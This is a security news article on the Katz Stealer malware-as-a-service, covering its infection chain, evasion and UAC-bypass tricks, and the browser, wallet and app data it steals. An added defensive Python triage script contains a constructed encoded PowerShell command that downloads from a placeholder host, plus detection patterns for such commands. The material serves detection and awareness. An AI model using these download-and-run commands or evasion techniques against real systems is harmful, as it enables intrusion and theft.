Katz Stealer Malware Targets Major Web Browsers, Crypto Wallets

A newly identified malware-as-a-service (MaaS) threat, known as Katz Stealer, is actively targeting users of popular web browsers including Google Chrome, Microsoft Edge, Brave, and Mozilla Firefox. The aim: to steal sensitive data such as login credentials, cookies, session tokens, and cryptocurrency wallet information. The malware has been observed exploiting vulnerabilities in over 78 Chromium and Gecko-based browsers, making it a significant concern for both individual users and organizations.
Katz Stealer Infection Chain and Evasion Techniques
Katz Stealer uses a multi-stage infection chain that begins with heavily obfuscated JavaScript delivered inside GZIP archives. When executed, the JavaScript runs a base64-encoded PowerShell script that downloads a .NET-based loader. The loader injects the stealer into legitimate processes using techniques such as process hollowing, allowing it to run without being noticed.
To avoid discovery, Katz Stealer employs extensive evasion measures: geofencing that prevents execution in specific regions, virtual machine detection via BIOS queries and system uptime checks, and sandbox evasion based on screen resolution. It also abuses trusted Windows tools such as cmstp.exe to circumvent User Account Control (UAC), gaining elevated privileges without prompting the user.
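As an added defender's example (not code from the article or from any Katz Stealer sample), the following triage check runs over constructed process-creation events and flags the two stages described above: a script host spawning base64-encoded PowerShell whose decoded body contains a download command, and a silent cmstp.exe .inf install. The event layout (parent image, image, command line) and the sample values are assumptions.

```python
import base64
import re

# PowerShell accepts -e, -ec, -enc and -EncodedCommand; the argument is base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_CMDS = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b")


def decode_powershell_b64(blob: str) -> str:
    """-EncodedCommand carries UTF-16LE text, so a UTF-8 decode would be wrong."""
    return base64.b64decode(blob).decode("utf-16-le")


def flag_event(parent: str, image: str, cmdline: str) -> list[str]:
    """Return the names of every rule one process-creation event matches (image names are basenames)."""
    findings = []
    parent, image = parent.lower(), image.lower()
    match = ENCODED_FLAG.search(cmdline)
    if image == "powershell.exe" and match:
        decoded = decode_powershell_b64(match.group(1))
        if parent in SCRIPT_HOSTS:
            findings.append("script-host spawned encoded PowerShell")
        if DOWNLOAD_CMDS.search(decoded):
            findings.append("encoded PowerShell contains download command")
    # cmstp.exe /s performs a silent connection-manager profile install from a .inf file;
    # outside software deployment this pairing is the UAC-bypass pattern the article mentions.
    if image == "cmstp.exe" and re.search(r"(?i)/s\b", cmdline) and ".inf" in cmdline.lower():
        findings.append("cmstp.exe silent .inf install (UAC bypass pattern)")
    return findings


def scan(events):
    """Run flag_event over (parent, image, cmdline) tuples; yields (event index, finding)."""
    return [(i, f) for i, (p, im, c) in enumerate(events) for f in flag_event(p, im, c)]


def b64_ps(text: str) -> str:
    """Encode text the way -EncodedCommand expects (helper for building the sample)."""
    return base64.b64encode(text.encode("utf-16-le")).decode()


# Constructed sample events; the download URL is a placeholder, not a real indicator.
STAGE2 = "Invoke-WebRequest http://loader.example.invalid/stage.bin -OutFile $env:TEMP\\s.bin"
SAMPLE_EVENTS = [
    ("wscript.exe", "powershell.exe", f"powershell.exe -nop -w hidden -enc {b64_ps(STAGE2)}"),
    ("powershell.exe", "cmstp.exe", r"cmstp.exe /s C:\Users\Public\profile.inf"),
    ("explorer.exe", "powershell.exe", "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for index, finding in scan(SAMPLE_EVENTS):
        print(index, finding)
```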
Data Exfiltration Capabilities
Once active, Katz Stealer establishes a persistent connection to its command and control (C2) server, downloading further payloads and injecting them into browser processes to harvest sensitive data. Notably, it can bypass Chrome’s app-bound encryption by extracting decryption keys from Local State files, saving them as plaintext for exfiltration.
Beyond browsers, the malware targets a wide range of applications and platforms, including:
- Cryptocurrency wallets (e.g., MetaMask, Exodus)
- Communication platforms like Discord and Telegram
- Email clients such as Outlook and Windows Live Mail
- Gaming platforms like Steam
- VPN setups, FTP clients, and Ngrok tokens
Its ability to extract data from such a diverse set of applications underscores the malware’s versatility and the breadth of its threat.